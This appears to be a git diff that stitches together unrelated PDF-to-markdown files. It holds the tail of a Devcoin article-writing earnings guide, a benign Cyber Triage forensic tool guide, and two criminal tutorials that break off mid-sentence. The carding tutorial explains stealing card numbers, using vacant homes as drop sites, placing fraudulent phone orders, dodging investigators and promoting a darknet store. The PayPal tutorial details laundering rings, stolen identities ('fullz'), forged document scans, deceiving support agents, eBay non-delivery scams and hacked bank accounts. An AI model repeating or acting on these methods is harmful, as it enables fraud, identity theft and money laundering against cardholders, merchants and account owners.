Nice, +huh? +Getting Paid +Now comes the bad news. Well, not really. I’ll take $527 for an hours’ worth of +writing any day. +If you look at the countdown page +(http://dvccountdown.blisteringdevelopers.com/) you will see that the payment +round won’t be complete until Feb 27. That’s because of how altcoins are + +processed. Each block is only so long and they each have to be mined so that all +the transactions get approved. That takes time. +So by Feb 27th at the latest (my transaction could be confirmed today or a couple +weeks from now) I will get 1,013,670 DVC sent to my Devcoin address. +To see if I’ve got paid, I run the DVC wallet on my PC every few days. It syncs all +of the latest transactions and if mine were in the latest blocks, then I will see +those DVC in my wallet. +Turning DVC into USD +Ok, so I got over a million DVC. That’s great and all, but it does me no good if I +can’t spend them or convert them into something useful, like BTC or even better +USD, right? +Now you see why I went through the process of online wallets and currency +exchanges for Joe (my previous example). +I’m not a speculator, but if you wanted to you could analyze the charts of all of +the major altcoins and see which ones have the greatest potential for gain and +then convert all of your DVC into that. Or you could put it all into something +more popular like LTC or BTC. Or you could cash out to USD. +For purposes of this report, let’s assume that you want to cash out to USD (or +your local currency if you’re in another country). +Once I get the DVC into my local wallet, I need to find an exchange that deals with +Devcoin. Fortunately, the previously mentioned exchange – Cryptsy – will allow +you to buy and sell DVC for either LTC or BTC. +But right now I just have all of my DVC in my local wallet, so I need to send that to +my Cryptsy account. Here is a step-by-step breakdown of the process. +1. First, you need to login to Cryptsy, then click on the Balances icon at the +top. + +2. Scroll down until you see Devcoin, then hover your cursor over it to bring +up a menu: +3. Click on “Deposit / Autosell DVC”. The deposit address will be blank, so just +click on the button to generate a new address: + +4. Copy that deposit address (yours, not the one above – unless you want to +send ME coins ;) ). +5. Now open my local DVC wallet and send coins to that deposit address. +6. After six confirmations, the deposit will go through and you will see your +coins show up at Cryptsy. +7. Now that you have your DVC at Cryptsy, you need to convert them to BTC. +a. Why? Because Coinbase only deals with BTC. Once we have BTC at +Coinbase, we can convert/cash out to USD. +8. Click on the Trade icon at the top of Cryptsy. +9. Scroll down until you see the DVC/BTC Market and click on that. +10. Here you’ll see a box where you can sell DVC for BTC. +11. In Amount DVC enter your total. For me it will be 1,013,670. It will +calculate the total BTC you can buy, the transaction fee, and the net total +BTC that you will receive. For the current prices as of this writing, here is +what mine would look like: + +(Since I don’t have any DVC in my account (yet) it shows that I have 0.0 DVC +available. ) +12. Once you submit the sell order, it will have to match your sell order with +other people’s buy orders and then process the transaction. Right now I +see a buy order for more than what I’m selling, so this should go through +pretty quickly. +13. After the transaction goes through, I will have 0.67712142 BTC in my +account at Cryptsy. Now I need to send that to my Coinbase account so I +can cash it out. +14. Login to Coinbase. On the left side, click on Account Settings. Above where +it has your name/email/etc on the page, you’ll see “Bitcoin Addresses”. +Click on that. +15. Create a new address. I like to then go into Details and give it a label. For +this transaction, I would enter “DVC from Cryptsy”: + +16. Copy that new address from Coinbase and go back to Cryptsy. +17. Again, click on Balances and scroll down to BTC. You should now see your +balance in BTC. In my example, it would be 0.67712142 BTC. +18. Hover over where it says Bitcoin and choose “Withdraw BTC”. +19. In the popup box, enter your exact amount of BTC, which is the number in +#17 for my example. Copy and paste in the new address from Coinbase in +the BTC Withdraw Address. Enter your password and captcha. +20. Cryptsy will assess a 0.0005 BTC transaction fee and show you the net: +21. Once I click on Process Withdraw, the money is sent to my Coinbase +account. +22. Go to Coinbase to confirm the transfer. You’ll see the balance in your +account once the transfer is complete. +23. In Coinbase, click on Buy/Sell on the left side. Then in the main area of that +page, click on Sell Bitcoin and enter how much you want to sell. In this +example, I’m cashing everything out and not leaving anything in any of my +accounts at Cryptsy or Coinbase. + +24. The “pay out method” that I blacked out is just my bank account info. Once +I sell the Bitcoin, I will get $536.83 transferred to my bank account. +Lather, Rinse, Repeat +The key to making this work consistently is just to keep writing. It’s really not that +hard. Write about anything you want! Just don’t give them crap. +Some Caveats +Just to be up front about this, you do know that this is not a get-rich-quick +scheme, right? If you have the patience to work the system and do it right, this +can be a nice extra income stream for you for a long time to come. +Be aware that each round for Devcoin is about a month long. So you can write +and submit your articles, and at the end of the round (about once a month). It +then takes about 3 weeks to get paid. So there is some lead time, but if you keep +doing this consistently, you’ll get paid monthly like clockwork. + +Here is how Devtome explains it: +http://www.devtome.com/doku.php?id=devtome_earnings_for_the_layperson: +After a round ends, which you can see at the Devcoin Countdown, another +2700 blocks need to be created before earnings start being paid out. Each +round lasts approximately a month, then there are approximately 21 more +days before you start getting paid. On your first round, especially if you +posted articles at the beginning of the round, this might seem like a long +time. If you post articles every round, what will happen is that you will get a +steady payout every month. Once the payout block begins, your full +earnings (your number of shares times how many Devcoins are in each +share this round) will be disbursed over the course of the next round until +all your shares are paid out, because each share is deposited individually in +a kind of round robin. +Conclusion +To sum up my experience, I copied two articles from one of my blogs, reposted +two previously published short stories from fictionpress.com, published a short +story I just had stored on my hard drive, and then actually only wrote some +ramblings about fantasy football and posted that. +Less than one hour of actual work. +Profit more than $500. +The potential here is outstanding, if you do it right and don’t try to cheat the +system. But if you act in a professional manner, post only original content written +by you that is useful, informative, and engaging, then this can be a huge source of +income for you! +Oh yeah, one of the best parts about all of this is that if you hold your coins, +whether that means the DVC that you earn, or if you hold onto the BTC or LTC (or +any other cryptocurrency that you exchanged into), as the value of these altcoins +rise, so does your net worth! + +If I don’t cash out the 0.67662142 BTC at Coinbase and instead just hold onto it +(whether in an online wallet like Coinbase, or even at an exchange like Cryptsy) if +the value of BTC rises, then your coins will be worth even more. +For example, let’s say I hold onto my BTC and two months from now Bitcoin takes +off and goes to $1200. Now I want to cash out because I have a need for some +cash (USD), so I go into Coinbase and transfer to my bank account. +Instead of the $536.83 that I would have received if I cashed out as soon as I +could, now I would get more: $1200/BTC x 0.67662142 BTC = $811.95, an extra +$275. +Of course, the price of BTC could fall, too. No one knows. If you want to +speculate and you think that prices will rise, whether that is short or long term, +then hold on to your coins and cash out when you think the time is right. But if +you need the cash and don’t want to gamble on the market, then just cash out +and enjoy your payday! +If you have any questions, I’d be happy to answer them in the thread (I’ll update +the FAQ as needed) or reply to you personally. +Cheers! +Rob +rob@cryptowonk.com +p.s. For the previous round (30) each share was worth $221, not just $61. This +means that my 7 shares would have been worth $1547 – three times what mine is +now worth! Since you never know what the value of DVC will be, the same +amount of work that you do (in my case 6 articles) could be worth $500 or $1500! + +FAQ +Q: Can this really be done without any money at all to start? +A: Yes. It’s free to set up the Coinbase and Cryptsy accounts, and it’s free to get a +Devtome account. All you have to do after that is write your articles and publish +them. As long as they fit the (very basic) criteria for the site, they count toward +your earnings. The only time money is really involved is linking your bank account +to Coinbase and withdrawing the cash. +Q: Can I outsource my writing? +A: I’m sure you can if you want to, but I would be careful. If you get lower quality +articles, then they may not be accepted and/or they won’t get that much traffic +on the site. +Q: Can I use PLR articles? +A: Like most people recommend, any PLR articles should definitely NOT be used +as copy and paste material. It is wise to rewrite them in your own words. My +feeling is that for the time it takes me to rewrite one, I could have just written one +from scratch. +Q: Won’t my earnings depend on the price of DVC? +A: Yes and no. You get so many allotted shares based on your word count and +other factors discussed in the report. Each share is worth X amount of DVC. +Those shares have intrinsic value, but to turn them into USD (cash out) you have +to convert them to BTC (or LTC) and then into USD. +Q: Can this get saturated? +A: Possibly. Since each round there is a set amount of DVC that are handed out +each round: 180,000,000. The number of DVC/share is determined by the +number of receiver lines (which is determined roughly by the number of +articles/words that you submit), so with more people getting shares, each share +could be worth fewer DVC. + +Q: Is there a limit to what I can submit each month? +A: Yes. Words are limited to 50,000 for each round. You can write more, and the +overflow will go towards next round’s payment. So if you wrote 70,000 words, +you’ll only get paid for 50,000 this round, and you already have a 20,000 balance +to start out the next round. +Q: Where I can get more detailed information on how/what to write? +A: http://www.devtome.com/doku.php?id=devtome_writers +That link will take you to the Devtome writers page where it has links to all sorts +of articles to answer most/all of your questions about how to write, what things +to write about, the formatting that they require to publish, etc. diff --git a/Cyber Triage Evaluation Guide_3v10_pdf.md b/Cyber Triage Evaluation Guide_3v10_pdf.md new file mode 100644 index 0000000..1934c07 --- /dev/null +++ b/Cyber Triage Evaluation Guide_3v10_pdf.md @@ -0,0 +1,110 @@ +# Cyber Triage Evaluation Guide 3v10 + + +--- + +Quick Start Evaluation Guide +Version 3v10 +This document was written to give you a quick overview of using Cyber Triage during your +evaluation. Additional details can be found in the Cyber Triage User’s Guide, available at: +https://docs.cybertriage.com. +Evaluation License Limitations +There are two ways to run Cyber Triage for an evaluation: +● If you have not evaluated it before, you can get a 7-day license that can ingest two +hosts. To do this, simply launch Cyber Triage and choose Evaluation Mode. +● If you have previously evaluated before or your 7-day evaluation ended, you can get a +longer license from the sales team (sales@cybertriage.com). This license will have the +same capabilities as a paid license. +Data Set Choices +When you launch Cyber Triage in evaluation mode, you’ll be given two options: +1. Use the provided Demo Data to get a basic understanding of the tool +2. Import your own test data set +Each of those options are covered below, but we recommend that you start with the demo data. +1 +Copyright 2025 Sleuth Kit Labs, LLC + +Demo Data +The easiest way to get a basic understanding of Cyber Triage is to use our evaluation demo +data, which has a mini intrusion scenario. +Choose “Demo Data” from the previous dialog and Cyber Triage will then create an Incident and +import the data set. You can then focus on looking at the analysis results. +Once the demo data has been imported, Cyber Triage will display a dialogue prompting you to +visit the website for training scenarios based on the demo data. +NOTE: Once you have loaded data, you can go back to it by exiting from the evaluation dialog +using the upper right X. +Your Test Data +The second option is to use your own data from a previous incident or test scenario. We +recommend doing this after you have tried the evaluation demo data. +Here are the basic steps: +1. Choose “Your Test Data” from the main menu and it will bring you to the panel below, +which will allow you to import data using various options. +2. Choose one of the nine options presented (details below). +2 +Copyright 2025 Sleuth Kit Labs, LLC + +3. Configure malware analysis settings based on if you want to upload file content to +ReversingLabs or not. +4. Review the results. +How you get evaluation data into Cyber Triage depends on the type of data that you have. +● Cyber Triage File: Choose this if you want to manually launch the Cyber Triage +Collector collection tool on a live system and have the results saved to a USB drive or +network share. To do this, you will need to first copy the Collector to a USB drive or +network share that the target system can access. +o Use the “Extract Collector” button in the upper right of Cyber Triage to do this. +Refer to the Collection Tool section of the User’s Guide on how to extract and +configure the Collector. +● Disk Image: Choose this if you have a disk image that you want to analyze. +o Supported disk image formats: +▪ Raw Image (*.img, *.dd, *.raw, *.bin) +▪ Raw Split (*.001, *.aa) +▪ EnCase (*.e01) +▪ Virtual Machine Disk (*.vmdk) +▪ Virtual Hard Disk (*.vhd, *.vhdx) +3 +Copyright 2025 Sleuth Kit Labs, LLC + +● KAPE: Choose this if you have a KAPE VHD or VHDX file that you’d like to import and +analyze. Currently, only the VHD and VHDX files are analyzed, and other KAPE outputs +are ignored. +● Network - PsExec: Choose this if you want to push the collection tool to a live system +over the network using PsExec. This requires you to have a domain administrator +account on the target system or that you have modified its registry. +o Refer to the Configuring PsExec section for information on how to configure +PsExec. +● Local Disk: Choose this method if you would like to analyze a local disc connected to +the host machine. Note that because this disk is not an operating system, not all artifacts +will be collected and analyzed. +● Linux UAC Files: Choose this if you have the output of the UAC collection tool from a +Linux system. You need to use the ‘-p full’ option. +NOTE: Cyber Triage will prompt you if you want to upload unknown files to ReversingLabs. By +default, it will. An offline scanning option is available for air-gapped networks. +More information on importing data into Cyber Triage can be found here: +https://docs.cybertriage.com/en/latest/chapters/importing/host.html +Analyzing the Data +Once data starts to come into Cyber Triage, analysis will begin. We recommend you follow the +steps as outlined in the top part of Cyber Triage +4 +Copyright 2025 Sleuth Kit Labs, LLC + +1. Use the Summary panels to get a basic orientation of the system. What was found from +automated analysis, what kind of users there are, etc. +2. Next, go to the Review Notable items view to review items marked as “Bad” and +“Suspicious”. You can change scores to “Bad” or “Unknown”. +3. Lastly, you can go to Examine All Items to see all of the collected data. +When reviewing data, you can use the bottom section to find data related to the item you are +looking at. For example, if you selected a file on top, then the bottom will show you which +processes are using that file and if there are startup items that refer to that file. +You can also right click on an item to see it in full timeline or in a file structure. +More information on analyzing data in Cyber Triage can be found here: +https://docs.cybertriage.com/en/latest/chapters/analysis.htm +Report Generation +After your analysis completes, you can generate various HTML and JSON reports from the +Dashboard. The HTML reports include detailed description of the threat items and a timeline of +activity. The JSON reports can be imported into SIEMs and other data analytics systems. +More information on generating reports can be found here: +https://docs.cybertriage.com/en/latest/chapters/reports.html +Thanks for trying Cyber Triage! +The Cyber Triage Team +Questions? Reach out to us at support@cybertriage.com +5 +Copyright 2025 Sleuth Kit Labs, LLC diff --git a/DONT GET CAUGHT CARDING_pdf.md b/DONT GET CAUGHT CARDING_pdf.md new file mode 100644 index 0000000..5246e75 --- /dev/null +++ b/DONT GET CAUGHT CARDING_pdf.md @@ -0,0 +1,226 @@ +# DONT GET CAUGHT CARDING + + +--- + +DISTRIBUTED BY AllAboutCarding +For Credit Cards,Paypal Accounts,Bank Accounts and more tutorials check out my store +Evolution market: http://k5zq47j6wd3wdvjq.onion/store/34615 +OK, so you want to card, eh? You see that Mac portable that's $5000, and know +you could handle one. You don't have to save up for 3 years to get it either. +The answer is CREDIT CARD FRAUD. It's a multi-million dollar a year +fraudulent scheme for those who know how to do it. All you need to do is +invest 2 minutes of you time to get ANYTHING that you want. +OK, to start off, here's a little tutor about the actual cards, carbons, +numbers, or whatever you want to call them... +__________________________________________________ ____________________________ +Information on Credit Cards +Visa Classic - in the format 4xxx xxx xxx xxx. ALWAYS ALWAYS ALWAYS start +with a 4. The 3 numbers after the 4 are the bank number (explained later). +Visa Gold/Preffered - in the format 4xxx xxxx xxxx xxxx. Same as the above +Visa, only has 16 digits. ALWAYS ALWAYS ALWAYS start with a 4. Same as the +Visa Classic, but with higher limits. +MasterCard - 5xxx xxxx xxxx xxxx. ALWAYS ALWAYS ALWAYS start with a 5. The +bank number is 3 digits after the 5. +Mastercard Gold - Same as the normal MC, but have much higher limits. +American Express- 3xxx xxxxxx xxxx. the number after the 3 is USUALLY a 7, +but doesn't have to be. This format is the same for the American Express +How not to get caught Carding.txt[9/3/2014 12:39:39 PM] + +Gold. (usually have npr preset limit). Contrary to popular belief, AMEX's +have limits. It's how much finiancial holdings (So they can reposses your +house if you don't pay in time!) that determines said limits. Amex Gold's +have higher limits that Amex Classic. American Express PLATINUM (Creme de la +Creme) have limits that are usually in the hundreds of thousands (drug lords, +crooked politicians, Donald Trump, etc) and sometimes in the millions. If you +are lucky enough to get one of these (I had one in my entire career and I +won't tell you what I got with it, because I don't know of anyone else I ever +knew that has what I got) don't blow it on a box of 10 disks. +Discover - 6011 xxxx xxxx xxxx. These are similar to Amex cards, in that the +limit is set higher than Visa/Mc cards. +All of these cards have expiration dates. I know that Visa/MC/Amex and +Discover say it right on the card/carbon. If you don't have the exp date, but +you know the card is valid, try something like (1/91). Make it January of the +next year. That's pretty common. As long as the card hasn't expired, the +people don';t give a fuck. +__________________________________________________ ____________________________ +Finding Drop Sites +Now the second thing you need is what's called a drop, drop site, drop point, +whatever. You don't want to use anywhere closeby if you can help it. The +little old lady down the street is OK, but try to be diversified in where you +go. If you do alot of times in one area, the Secret Service get's calls and +How not to get caught Carding.txt[9/3/2014 12:39:39 PM] + +then they come out there. While on the topic of the law, the ONLY branch of +law enforcement that investigates Credit card fraud is the Secret Service. +They are a branch of the Treasury department. The FBI has NOTHING to do with +credit card fraud. So if you see some Aries K (actually Chevy Corsicas now!) +cars with municipal plates around your neighborhood, be WEARY! They don't +just follow the president around with earpieces and black 3 piece suits! +These bastards will NAIL you. I almost found out the hard way! +OK back to the drops. Keep your ears open. I find that people ALWAYS blab +about when they are going away on vacation for a week or two or three. It's +human nature. I used a drop site one time for 2 straight months while the +residents were away. Things to look for are closed shades, floodlights that +are on, lights that go on at a specific time every night, old newspapers in +the driveway, whatever. Get the adress, Zip code, and city, and if you can, +who lives there (just look in the mailbox). +__________________________________________________ ____________________________ +Getting the Acutal Credits Card Numbers! +A few good ways to get carbons are to go trashing (looking in dumpsters of +gas-stations, and other stores that get alot of credit card business) or you +can get a JOB at a place like that! (Great, I did it myself) or you can use a +credit bureau such as TRW. Don't use this unless you ABSOLUTELY know what +you're doing. I still don't use it too much. +__________________________________________________ _____________________________ +OK, so you have your drop and you have your card number. So you want to +How not to get caught Carding.txt[9/3/2014 12:39:39 PM] + +order, right? Well sort of. Take your time and decide what EXACTLY it is you +want. Don't be on the phone making the order sounding unsure of yourself. +Salespeople know what's going on then. Then call the place, and have the name +and adress and phone number ready. (You can make up a phone number, or use one +that rings and rings and rings, but don't use the one from the drop point). +__________________________________________________ _____________________________ +How To Order Your Goods! +Sample Order... +Computer Products, this is Steve, how may I help you? +Yes sir, I am looking to place an order on an item I saw in blah-blah +magazine. Can I ask you the price just for confirmation? (Stuff like this +makes it sound like you are the real guy, and are worried about your money!). +Steve- Yes, it is $699. +You- OK, that's what it says here. OK, I'd like to place an order for one +computer card. +Steve- OK, may I have your name? +You- John Smith +Steve- OK Mr Smith, and how would you be paying for this? +How not to get caught Carding.txt[9/3/2014 12:39:39 PM] + +You -With my mastercard +Steve - The number please? +You - 5217 5478 0004 9812 +Steve (reads back for confirmation) +You- Yes sir +Steve- OK, may I have your billing address? +You- (OK this is where it gets tricky. Sometimes the place will have to call +for confirmation when the billing and shipping addresses don't match. I'll +supply you with places that don't care). 1616 Mockingbird Lane, Anytown, +Anystate. 99457. +Steve- Allright, we'll ship that out to you today. +You - (The wisest choice is OVERNIGHT. Then they are in a rush to get it out, +and you get it ASAP wihtout worries.). Do you ship UPS Red label? +Steve - Yes we do. That's an additional $28. +You - OK, that's fine. Sir, could I have a total on that? (Sound serious) +How not to get caught Carding.txt[9/3/2014 12:39:39 PM] + +Steve- Yes, that comes to $727. +You - OK, thank you very much. +Steve- Thanks for calling Computer Products, have a good day. +__________________________________________________ ____________________________ +Post Order actions +Allright, you placed the order and it seem to go flawlessly. What you need to +do now is to call back and get a shippers routing number (if you are not sure +that the place is totally GULLIBLE!). ALWAYS ALWAYS ALWAYS ALWAYS use United +parcel Service if you can. They just leave the package at the door and leave. +Airbone Express, Federal Express, and DHL all require signatures. You either +have to risk being remembered by the guy, or you have to leave a note on the +door of the drop point. UPS is the easiest by far. +So, you call back to see if it shipped, and if it did, COOL! You're in +business. +__________________________________________________ ______________________________ +guy, or you have to leave a note on the door of the drop point. UPS is the +easiest by far. +So, you call back to see if it shipped, and if it did, COOL! You're in +business. +__________________________________________________ _____________________________ +How not to get caught Carding.txt[9/3/2014 12:39:39 PM] + +Picking up your stuff at the drop point +When I started out, I was under the legal driving age. So I had a friend of +mine go in on me with this deal. He drove. If it's closeby, you could get +away with walking or riding a bike, but you look suspicious lugging a box +around with you. The onyl real way to get around the car problem is to go at +night so you aren't spotted. +***** ATTENTION ***** +If you are TRULY desperate for a drop site (Such as me, I had to get my +girlfriend something special [ a $1200 diamond ring from BEST Products]) then +call the place you ordered from and get the routing number. Then get the +number for the local UPS/Airborne/DHL in your area. Tell them that you will +pick the package up on your way to work (or some shit like that). You go in +there, and SIGN THE SHEET WITH THE OPPOSITE HAND THAT YOU USUALLY WRITE WITH. +Then there is no way that you can be matched with it. Wear clothes that you +usually don't, but don't go in there in a clown suit, or you'll be remembered. +You can only do this once in a while though. +__________________________________________________ _____________________________ +Post Pickup Procedures +After you pick the package up, take ALL the stickers and marking that the +shipper and place you ordered it from put on there. This way, its +How not to get caught Carding.txt[9/3/2014 12:39:39 PM] + +untraceable. Keep the box though, unless you are TRULY paranoid about your +parents or whatever. Also, try and get all the serial numbers off of it. Use +rubbing alcohol, a pen knife or whatever to scratch them out or peel them off. +Keep the nubmers somewhere (taped on the TOP part of your door) or some other +place that no one would ever dream of. They may come in handy once you know +what you are doing. +Also, if you are going to resell the item (It financed part of my childhood +until I got into other things) DO NOT give the person the registration and +warranty unless you really trust them. If they register an item with the +company, abd there happens to be serial nubmers in ROM or under some obscure +chip, you could be fucked. +__________________________________________________ _____________________________ +What to do if confronted +If you are ver confronted by anyone (Police, Shipper, retailer) do not admit +anything. Just deny you even know what they are talking about. The only way +you can be caught is if they actually record you placing the order, and find +you picking it up. Even then there are alot of ways out of that (Ask a +trustworthy lawyer, I am not giving away ALL my secrets!). If you need an +alibi in the way of "Where you got this?" just say you went to a computer show +and a guy sold it to you off the back of a truck. You didn't ask him any +questions, and he said he'd send you a receipt in the mail. +__________________________________________________ ______________________________ +How not to get caught Carding.txt[9/3/2014 12:39:39 PM] + +Have Fun! +Now you have a way to get whatever the fuck you want, when you want it! It +works, beleive me. I have tallied up all the stuff I have ever done (Most is +still with me) and I got a total of $67,000. Yes sixty-seven THOUSAND. +That's after 3-4 years of straight carding.It would take the average kid about +67 years to save that much up. Not you though! +__________________________________________________ _____________________________ +MacWareHouse- 1-800-ALL-MACS (255-6227). They carry stuff for IBM's Macs and +Apple II's and maybe even Amiga's. They give you a catalog with your first +order (and every time after that) or you can call them and ask for a catalog. +They accept Visa/MC/Amex. Their only drawback is that they usually Ship +Airborne Express. However, they GUARANTEE overnight shipping for $3. Yes, 3 +bucks. Not that money is a matter to you now, but it shows that they are +fucking in a hurry to get your order out the door. I have found out that they +do the billing 3-4 days after you get the package. GREAT place to get what +you want. UPS RED is available, however, no one in their right mind would use +it, since it's like 10 times more expensive than Airborne (Macwarehouse has a +deal with Airborne, Macwarehouse is their biggest sender on the East coast!). +Whenever I go UPS from Macwarehouse, I just give the operator some bullshit +like "Airborne won't deliver to my location overnight and I need it quickly". +That's all. +Quality Computers- 1-800-443-6697. Another Gullible place. They sell stuff +for alot of computers too. They take Visa/MC/Discover. Nice place, uses UPS +How not to get caught Carding.txt[9/3/2014 12:39:39 PM] + +and ships overnight too. +BEST Products, INC. 1-800-950-BEST. They sell EVEYRTHING (if you happen to +live near one of their outlets, go in there,a nd either grab a catalog, or +write down the product nubmers of what you want and give them to the operator +when you order! They take everything and ship everyway. +OK, now that I am just about out of this business for good (Heheh, nothings +definate!) I want you to take over in my tradition of glory. It is the +greatest thing that happened to my financial (and sexual) life. What chick +couldn't dig you if you gave her a $1200 piece of ICE??? +If you're careful, and don't go overboard, you'll never get caught. Don't +tell anyone except your most trusted friends (and not even them unless you get +them involved so they can't rat on you if your friendship goes sour). Even +though you virtually can't get caught (even if somneone rats on you) It's +always nice to be anonymous. +DISTRIBUTED BY AllAboutCarding +For Credit Cards,Paypal Accounts,Bank Accounts and more tutorials check out my store +Evolution market: http://k5zq47j6wd3wdvjq.onion/store/34615 +How not to get caught Carding.txt[9/3/2014 12:39:39 PM] diff --git a/Dr Cleans PayPal Methods_pdf.md b/Dr Cleans PayPal Methods_pdf.md new file mode 100644 index 0000000..be28897 --- /dev/null +++ b/Dr Cleans PayPal Methods_pdf.md @@ -0,0 +1,416 @@ +# Dr Cleans PayPal Methods + + +--- + +Just beware plenty of fake vendor trying to sell you guide that never +works and attempt to create fake impression that his/her method is +actually working. in fact, after i carefully studied his post.. there are +big flaws and never can achieve what the vendor claims +usually the first thing you have to pay attention is the username, those +conman usually use prestigious nickname like Doctor, phd, lawyer, +principal, professor, etc.. followed by their post boasting living in +mansion, with ferrari, hot chicks, swimming pool, etc. they also publicly +claimed his method made 100 - 200k.. in reality that probably means 1 or +2k only. usually they telling you gonna reveal the method most likely +because their own method about to get saturated +i have nothing against "Dr.Clean" but it seems the evo forum is becoming +playground for con-artist, filled with fantasy story teller and its +dissapointing not a lot of ppl talk about proper fraud anymore. however +some of his advice seems useful in some aspect so here is the post. but +when you read further you'll realize he contradict himself as well..such +as u have to call paypal immediately, but later saying we are not +encouraged to call paypal and just send in scans. he also claimed using +ebay scams..but later said ebay scam method is not preferred lol..he also +didnt tell us anything about the ebay fees..apparently this gonna eat up +lots ur money when in the process of creating fake ebay feedback..bcoz u +need to remove ebay selling limitation before can start the scams.. and +using fullz to create paypal account.. this may not resulting in sucess +because if the same fullz has been used by the original owner. you +obviously cant create the paypal account again. he also claimed using +whonix, openvpn setup..but +later saying preferred just use dedicated ip..lol +Dr.Clean wrote: +The majority of people believe all that entails in aging a pay pal is +send money from one paypal account you own to another account you own +back and forth but that is not the case. The problem that arrives is that +the majority of people when aging an account trigger pay pals security +algorithms because they create a very abnormal payment pattern. They will +age an account with completely clean funds using accounts they have +access to and nothing else and then decide one day that they will try to +send dirty money to the account from locations that do not match the +pattern the account has created and then wonder why the account was +flagged and placed on restriction. The pattern became abnormal. +We must create a pattern that matches the payment location, amounts, +frequency and pattern that pay pals security programs will see when they +are analyzing payment validity. How do you do this? Hook your paypal to a +gateway or an online store (tictail, shopify) or a gateway(freelance +sites, ecommerce etc anything in which it is normal to get paid very +large amounts in one transaction) Buy prepaid cards from different +countries, make large legitimate payments from different cards and +different locations etc try to shy away from rounded amounts like 1k 2k +5k etc include decimal amounts( like 5005.67, 3010.35) in the payments +rounded payments with no taxes consistently will trigger the security +algorithms + +Pay pal is looking at unverified accounts receiving large amounts from +the point of creation +Location, age, amount, frequency, and where the source of said funds. +All you will need is a document scan vendor to get a paypal unrestricted, +I create my own scans but a good vendor should be good enough to pass, be +sure to use a scan that looks legitimate and not a altered scan +If you are ever flagged be sure to call paypal immediately and appear +extremely dismayed ( remember you are a legit customer and this is your +money you MUST make PP think this to get unrestricted. Present the +correct documentation and if it they don't just put you on hold and ask +to many questions simply hang up and call back, you will get an agent who +really could care less eventually and will probably verified the +documents as long as they look somewhat legit. +Summary : abnormal pattern +Aging paypal : do not transfer back and forth to the multiple paypal +accounts you own. after a while, this will have a pattern..then one day, +when you try transfer a dirty fund from another account.. this creates +abnormal pattern. so paypal security triggered and limits/restricted your +account. +so you must create a normal pattern. normal patterns means like payment +location, amounts, frequency +hook paypal to a gateway +-tictail +-shopify +-freelance site +get prepaid cards from different country (this steps is rather difficult, +he only shows me buy usa prepaid card from Saguaro at evo marketplace), +make large legit transaction like 1k, 2k, +-do not use rounded amount like $1000, $2000, $3000, $4000, this will +trigger security +-use decimal amounts, for eg: $1025.35, $2310.50, $3504.10 +all the account used in the process must be verified. if account +restricted, be prepared with the scans +if flagged, call paypal immediately(use spooftel) and appear extremely +dismayed, must make paypal think you want this resolved asap. if agent +ask too many questions, just hang up and call back, until you get an +agent couldnt care less and will probably verify the docs as long as they +look somewhat legit. +Dr.Clean wrote: +I wouldn't recommend trying to SE the restriction seeing how easy it is +to get doc scans on the market and even the clearnet if you know where to +go (and they are dirt cheap really for the money you make from them), Ive +only gotten one account off of hold without the correct documentation and + +I still cant figure out how I did it, I account it to incompetence on the +part of the agent I was speaking with and not my SE skills( even though I +have acquired high quality SE skills especially with pay-pal agents) Just +buy Doc Scans. +Summary : +Not recommended to call/social engineer the restriction, you can get docs +scans easily and its cheap +Dr.Clean wrote: +I find that the accounts from buyvcc majority of the time are not +verified(unless you ask them directly for a verified account and become +restricted and need doc scans very easily after the first couple of +transfers I have yet to have an account from buyvcc that doesn't +eventually get restricted(not that it matter if you have a good source +for doc scans. +But for setting up a paypal ring they are great funding/ and cashout +accounts( some of the best) especially if you are using eBay scams to +fund you paypal ring because you can pay extra money to have a ebay +account already linked to the account from buyvcc. ( honestly it is +better to let your account become limited and then have it unrestricted +it lifts the transfer limits to almost double on personal and premier +accounts and triple for business accounts) So for the cashout account or +the funding account I would reccomend buying from vcc allowing it to +become limited at the end of the aging process and un restricting the +account to have the account cashout limits lifted. +For middle man accounts (which assist in cleaning the funds) I would +reccomend buying fullz and creating an account yourself. Simply because +you can get great fullz with valid information for opening a mirad of +middle man accounts in bulk( paypal is less likely to chargeback money +thats bounced through 4 or more accounts and even if it has it will not +put your cashout account in the minus it will take the money from the +first line middle man accounts or wherever they think the fraud occurred +from) I call these accounts the throw away middle man accounts as they +will more than likely go into the negative when the chargeback hits and +you will have to throw them away. Giving you the chance to constantly be +moving the accounts from the back line to the front line when you must +create more accounts (I would at least recommend keeping 5 middle man +accounts and rotate them in the order which they receive payment from +oldest first to youngest last) this way you can constantly update your +pay pal ring when accounts +become throwaway first lines. +Summary : +buyvcc account, great for funding and cashout account. +to fund the account, do it via ebay scams. buyvcc acc with options of +ebay acc already linked + +then money transfer to another paypal account. known as middle man acc or +paypal ring +to remove the limits of your funding/cashout account.. let it become +limited.. and wait until it unlift. this will increase your transfer +limit, double for personal & premier acc, triple for biz accounts. then +until sending/withdraw limits is unlimited +create middle man accounts method : buy fullz, then create the account +yourself. +when receive money from funding accounts, paypal is less likely +chargeback money that bounced through 4 or more accounts. so at the end, +your cashout account will not affected +the middleman account will get chargeback and in negative, this will be +throwaway accounts. +recommended to have 5 middle man account ready, and when oldest hit with +chargeback, throw it away and replace with new middleman account. do it +in sequential order.. constantly update your paypal ring, from oldest +first to youngest last. +Dr.Clean wrote: +If you want quick funds link your funding account to a payment gateway or +online store and buy bulk cc's and card the funds Redson Elmachioo77 or +another of the great cc vendors will do for the quick dirty funding +method. +If you want somewhat cleaner funds link your pp to a EBAY or any bidding +site and list something that would physically take forever to ship(at +least 2 weeks i.e. a fridge, a safe, something that is rather heavy in +weight) list it at 60-85% of asking price and never ship the item. It +will result in a charge back so if you use this method I would use fullz +to create your funding account because it will get burned eventually +If you want even cleaner funds buy hacked bank accounts preferably TD, +BOA, Wells etc match the info on the PP account to the info on the bank +account and link the bank account to the pay pal account and transfer the +money from your funding account through to your middle man accounts. +Try to match the frequency and transfer amounts that are on the hacked +account not to raise suspicion and try to get high balance business +account (your funding account will get burned eventually so use the info +from the account and try to get an account with the highest value and +most information) also if you use this method try to bounce the funds at +least 3 times. I would reccomend buying fullz buy the bulk from those +with large amounts in the bank or high value credit limits (as they are +less likely to find out that a paypal has been opened in theyre name). +Summary : funding method + +1.) link funding account to payment gateway -> buy bulk cc and card the +funds. cc vendor like Redsons, Elmachio77 +2.) link funding account to ebay, bidding site. list something that would +physically take forever to ship. at least 2 weeks for eg: fridge, a safe, +heavy in weight. list it 60 - 85% of the retail price and never ship the +item. if you going this route, use fullz to create the paypal account, +same as middle man account method. because will get burned/throw away at +the end. +3.) buy hacked bank accounts - TD, BOA, Wells fargo +funding paypal account link it with the bank logins/number/routing +details u 